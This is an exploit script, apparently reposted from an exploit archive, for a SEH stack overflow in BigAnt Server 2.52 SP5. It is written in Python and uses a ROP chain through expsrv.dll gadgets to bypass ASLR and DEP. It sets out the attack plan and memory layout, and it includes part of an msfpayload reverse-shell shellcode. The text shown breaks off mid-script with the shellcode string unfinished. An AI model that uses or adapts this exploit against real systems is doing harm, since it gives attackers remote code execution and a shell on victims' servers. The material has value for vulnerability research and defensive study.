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BigAnt Server 2.52 Stack Overflow
来源:vfocus.net 作者:Cantoni 发布时间:2012-11-07  
# Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)
# Date: 03/11/2012
# Exploit Author: Lorenzo Cantoni
# Vendor Homepage: http://www.bigantsoft.com/
# Version: BigAnt Console 2.52 SP5
# Tested on: Windows 7 SP0 x86 Italian - expsrv.dll (6.0.9589)
# Info: Vulnerability discovered by Lincoln: http://www.securityfocus.com/bid/37520/info
import socket
import sys
#Attack plan
#1) Overwrite SEH handler with a ROP Gadget that will move the stack pointer inside our buffer and continue the execution from there (ADD ESP,something + RETN should be ok)
#2) Execute the ROP Chain for a VirtualAlloc() and PUSHAD
#3) Run the shellcode
#4) Have fun :)
# Memory Layout
# Padding
# ROP-NOP Sled
# ROP Chain
# Padding
# Shellcode
# Padding
# SEH Overwite (Stack Pivot)
# Padding (may be useful for other shellcode?)
#From the original exploit, SEH will be overwritten after 966 bytes
#./msfpayload windows/shell/reverse_tcp EXITFUNC=thread LHOST= LPORT=4444 R | ./msfencode -a x86 -b "\x00\x0a\x0d\x20\x25" -t c
# size 317
shellcode = ("\xb8\xc0\xd7\xb6\x97\xdb\xd2\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
#  ROP Chain target
#            EAX = NOP (0x90909090)
#            ECX = flProtect (0x40)
#            EDX = flAllocationType (0x1000)
#            EBX = dwSize (0x1)
#            ESP = lpAddress (automatic)
#            EBP = ReturnTo (ptr to jmp esp)
#            ESI = ptr to VirtualAlloc()
#            EDI = ROP NOP (RETN)
# we will ROP inside VBAJET32.DLL which is proprietary and an OS DLL, C:\Windows\system32\expsrv.dll
ropchain = ''
for i in range(0,16): ropchain = ropchain + '\xc5\x86\x9e\x0f' #ADD EAX 100 - RETN  # REPEAT 16 TIMES
ropchain = ropchain + '\x3c\xe4\x9e\x0f' # The next gadget point to the following
#0F9EE43C   8BD0             MOV EDX,EAX
#0F9EE43E   8D41 08          LEA EAX,DWORD PTR DS:[ECX+8]
#0F9EE441   C1E0 04          SHL EAX,4
#0F9EE444   2BC2             SUB EAX,EDX
#0F9EE446   5F               POP EDI
#0F9EE447   5E               POP ESI
#0F9EE448   5D               POP EBP
#0F9EE449   5B               POP EBX
#0F9EE44A   C3               RETN
# According to my  registers values, at pivoting time ECX+8 should point to a valid memory location so we go on
ropchain = ropchain + '\x9f\x18\x9a\x0f' # RETN POPPED IN EDI (ROP-NOP)
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP ESI
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP EBP
ropchain = ropchain + '\xff\xff\xff\xff' # will be popped in EBX (and incremented later)

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